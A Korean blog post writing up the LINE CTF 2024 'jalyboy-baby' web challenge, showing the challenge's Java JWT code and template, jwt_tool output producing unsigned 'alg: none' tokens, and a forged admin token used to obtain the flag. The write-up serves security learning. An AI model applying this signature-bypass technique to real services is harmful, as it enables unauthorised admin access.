고정 헤더 영역
상세 컨텐츠
본문
728x90
반응형
package me.linectf.jalyboy;
import io.jsonwebtoken.*;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.security.Keys;
import java.security.Key;
import java.security.KeyPair;
@Controller
public class JwtController {
public static final String ADMIN = "admin";
public static final String GUEST = "guest";
public static final String UNKNOWN = "unknown";
public static final String FLAG = System.getenv("FLAG");
Key secretKey = Keys.secretKeyFor(SignatureAlgorithm.HS256);
@GetMapping("/")
public String index(@RequestParam(required = false) String j, Model model) {
String sub = UNKNOWN;
String jwt_guest = Jwts.builder().setSubject(GUEST).signWith(secretKey).compact();
try {
Jwt jwt = Jwts.parser().setSigningKey(secretKey).parse(j);
Claims claims = (Claims) jwt.getBody();
if (claims.getSubject().equals(ADMIN)) {
sub = ADMIN;
} else if (claims.getSubject().equals(GUEST)) {
sub = GUEST;
}
} catch (Exception e) {
// e.printStackTrace();
}
model.addAttribute("jwt", jwt_guest);
model.addAttribute("sub", sub);
if (sub.equals(ADMIN)) model.addAttribute("flag", FLAG);
return "index";
}
}src 폴더 내 JwtController.java 코드를 보면, sub가 admin인 경우 flag를 설정해준다.
</head>
<body class="light">
<div class="center">
<h1>LINECTF2024 | jalyboy-baby</h1>
<h2>Hi ${sub}!</h2>
<#if flag?has_content>
<p>flag is <code>${flag} 🎉</code></p>
</#if>
<div>
<a href="/?j=${jwt}" class="button">login as guest</a>
<a class="button disabled">login as admin</a>
</div>
</div>
</body>
</html>template 폴더 내 파일을 보면, flag가 content가 있는 경우 해당 플래그를 출력해준다.
JWT None Algorithm Attack
python3 jwt_tool.py eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.rUKzvxAwpuro6UF6KETwbMPCLBsPGUScjSEZtQGjfX4 -X a
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
Original JWT:
jwttool_e8b79932f9b200bcb1d67f918f410892 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_a466c9117a64f186531a01d63ce78137 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_c1bd6b0c038e86c7e187ca43500a4db1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_bd7c8b549e8dc1c8792351fb9a67b871 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJndWVzdCJ9.jwttool 도구을 이용해서 algorithm이 none인 경우를 테스트해봤다.
sub가 guest인 경우를 준 것으로, admin일 때의 base64 url encode를 한 token인 eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9. 을 j 파라이터 값으로 줬다.
728x90
반응형
'WEB HACKING' 카테고리의 다른 글
| [LINE CTF 2024] jalyboy-jalygirl (0) | 2024.04.10 |
|---|---|
| [HackCTF] 보물 (0) | 2022.01.07 |
| [HackCTF] Button (0) | 2022.01.07 |
| [HackCTF] / (Web) (0) | 2022.01.07 |
| [HackCTF] Hidden (0) | 2021.05.03 |
